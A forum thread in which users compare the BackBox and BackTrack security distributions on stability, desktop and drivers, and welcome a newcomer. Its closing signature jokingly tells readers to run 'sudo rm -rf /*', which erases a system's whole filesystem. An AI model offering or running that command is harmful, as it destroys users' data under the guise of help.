BackBox vs BackTrack

Well this is my first post (replay) in this forum, Hello!

Backtrack has every thing to be a security station but stability!
heavy modification in kernel make it unstable and I think it's not good for everyday using as a desktop.
best way for bt is run from usb beside main os.
desktop is e little rough.

but backbox is different, it's very stable and we can use it a os for everyday using. desktop is very nice and light. (i personally like
light desktop like openbox or fluxbox and xfce, hate gnome 3).
security tools are really complete and i think there is not any weakness against bt.

I'm using bt under virtualbox in bb!

but what is power of bt? it's old and pioneer in its way.

Hi everyone this is my first post here @Backbox, I am a proffesional pentester working for a very large company.
And I am totally disillusioned with Backtrack, especially BT5R2.
The new release has too many problems, NVidia drivers that I just can't get working and updates that don't work etc etc.
So I am as I type this post downloading Backbox linux amd64 in hope that its more stable easier to look after and in general a better experience.
I has also took the liberty of looking around the forums and I find its a much nicer place than BT forums, you guys know what you're doing and don't mind helping others.
Keep up the great work.

You'll be fine with backbox, and welcome to our forum  :)

Hi Dave,

We're a Lot Like You, and little different in same time. Once, when you will use BBox, and most of your pentest run without problems, you will be happy because you have found this place and this great team.

Hope to see you in the future !

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
